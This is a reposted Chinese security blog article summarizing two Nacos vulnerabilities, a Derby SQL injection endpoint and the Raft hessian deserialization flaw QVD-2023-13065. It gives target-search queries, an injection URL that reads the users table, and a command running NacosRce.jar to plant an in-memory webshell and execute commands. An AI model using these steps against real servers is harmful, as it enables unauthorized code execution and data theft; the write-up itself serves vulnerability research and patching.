nacos漏洞整理(二)

admin 2024年12月12日09:55:35评论55 views字数 735阅读2分27秒阅读模式

A

U

T

U

M

N

点击“蓝字”关注我们

nacos漏洞整理(二)
使用说明:本篇文章旨在提供网络安全技术研究的信息和知识,以供信息技术专业人士、学者和爱好者学习和交流。我们鼓励读者提升自身的技术能力,增强网络安全意识,并为维护网络空间的安全做出贡献,切勿用于其他不合法事项,遵守《中华人民共和国网络安全法》

A

U

T

U

M

N

nacos漏洞整理(二)

1.nacos 

 Nacos 是一个易于使用的平台,用于动态服务发现和配置管理。它是阿里巴巴开源的一个更通用的解决方案,旨在解决云原生应用中的服务发现、配置管理、服务健康检查和动态服务注册等问题。Nacos 通常用于微服务架构中,以支持服务的弹性、容错和高可用性。

2.漏洞描述

(1)SQL注入漏洞

(2)Nacos集群Raft反序列化漏洞(QVD-2023-13065)

3.影响版本

nacos

nacos漏洞整理(二)

4.资产测绘

title="nacos"app="nacos"
nacos漏洞整理(二)

5.漏洞复现

5.1.SQL注入漏洞

/nacos/v1/cs/ops/derby?&sql=SELECT *FROM users
nacos漏洞整理(二)

5.2.Nacos集群Raft反序列化漏洞(QVD-2023-13065)

Nacos 集群Raft反序列化漏洞(QVD-2023-13065),在Nacos集群处理部分Jraft请求时,攻击者可以无限制使用hessian进行反序列化利用,漏洞利用集群间通信端口 7848(默认配置下)最终实现代码执行。

使用工具自动注入内存马并执行命令

命令:java -jar NacosRce.jar http://IP:8848/nacos  7848 "whoami"

nacos漏洞整理(二)

冰蝎内存马链接

nacos漏洞整理(二)

6.漏洞影响

(1).可通过上述漏洞控制系统

(2).数据泄露

7.漏洞修复

打补丁升级到高版本

A

U

T

U

M

N

nacos漏洞整理(二)

原文始发于微信公众号(安全技术达人):nacos漏洞整理(二)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月12日09:55:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nacos漏洞整理(二)https://cn-sec.com/archives/3498531.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息